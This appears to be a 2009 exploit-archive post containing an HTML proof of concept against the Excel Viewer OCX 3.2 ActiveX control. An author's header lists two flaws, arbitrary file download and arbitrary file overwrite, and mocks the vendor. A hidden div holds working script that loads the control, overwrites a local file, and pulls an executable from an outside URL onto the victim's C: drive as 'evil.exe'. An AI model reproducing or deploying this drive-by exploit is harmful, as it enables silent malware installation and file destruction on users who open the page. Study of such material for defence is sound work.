excelocx-insecure.txt
Posted on 13 January 2009
<html> <body> /* --=0-0-000000000--x==-xxxxxxxxx<br/> - Excel Viewer OCX 3.2 <br/> homepage: www.officeocx.com <br/> download: www.brothersoft.com/excel-viewer-ocx-51797.html <br/> - RegKey Safe for Script: True<br/> - RegKey Safe for Init: True <br/> - Implements IObjectSafety: True <br/> - IDisp Safe: Safe for untrusted: caller,data <br/> - IPersist Safe: Safe for untrusted: caller,data <br/> - IPStorage Safe: Safe for untrusted: caller,data <br> - Tested on Avant Browser 11.7.21 ie 6 <br/> Vuln: <br/> 1) Arbitrary File Download [HttpDownloadFile]<br/> 2) Arbitrary file owerwrite [Save] <br/> <br/> --==0-0000000011011110=== <br/> Propably it worst apps i ever see <br/> this is funy that It is meant as Safe for scripting <br/> They want sell it l0l <br/> ---000----------++++---------------000 <br/> Alfons Luja <br/> Pozdrawiam swoich fanóF <br/> 9002 <br/> :P <br/> 00 -0000000000000000===------------------x <br/> */<br/> <div style="visibility:hidden;"> <object classid='clsid:18A295DA-088E-42D1-BE31-5028D7F9B965' id='kupa'></object> <script type="text/javascript"> /* I dont know why but this code act correct only first time later it just crash ie In avant browser always is ok but it is necessary to wait a lot time to finsh loading - strange :x */ try{ var obj = document.getElementById('kupa'); var rem = "http://www.adalex.pl/motyl/motyl-radio.exe"; var loc = "C:evil.exe"; obj.Save("C:owerwrite.ini"); obj.HttpDownloadFile(rem,loc); } catch(err){ window.alert('Poc failed'); } </script> </div> </body> </html>
